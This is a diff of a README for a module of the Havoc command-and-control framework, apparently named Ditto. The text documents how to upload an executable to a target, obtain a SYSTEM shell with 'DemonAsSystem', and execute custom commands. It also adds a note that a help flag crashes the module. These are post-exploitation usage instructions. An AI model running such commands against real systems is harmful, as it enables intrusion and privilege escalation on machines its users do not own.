MaldExE/Havoc_impersonnate/README.md

 #### Upload
 ##### Step 1

 This command is used to set the local file to be uploaded to your target.
-The upload requires your session ID.
+The uploaded file take your id session havoc to name it.

 ```
 Ditto-upload SetExecutableFile /home/arthur/Documents/malware/havoc_module/Havoc_impersonnate/Ditto.exe
 ```

+##### Step 2

-To obtain a system shell:
+**To obtain a system shell:**

 ```
 Ditto-upload DemonAsSystem C:\Users\arthur\Desktop\tmp\Hello.exe
 ```

-To execute a custom command for Ditto:
+**To execute a custom command for Ditto or other executble:**
+!!!
+Warning !!!
+the option -h or --help was interprete by havoc and craching my module

 ```
 Ditto-upload Exec help
 ```